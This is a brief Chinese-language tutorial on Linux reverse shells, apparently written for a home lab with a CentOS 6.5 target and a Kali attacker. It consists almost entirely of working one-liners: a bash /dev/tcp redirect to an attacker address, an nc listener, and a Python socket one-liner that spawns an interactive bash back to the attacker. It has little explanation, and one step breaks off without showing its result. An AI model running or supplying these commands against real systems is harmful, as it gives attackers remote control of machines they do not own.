linux反弹shell

CentOS 6.5：192.168.0.3

kali2.0：192.168.0.4

方法1：
反弹shell命令如下：

bash -i >& /dev/tcp/ip/port 0>&1
首先，使用nc在kali上监听端口：

nc -lvp 7777

bash -i >& /dev/tcp/192.168.0.4/7777 0>&1

执行bash -i >& /dev/tcp/ip/port 0>&1或者bash -i >& /dev/tcp/ip/port 0>&2后：

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"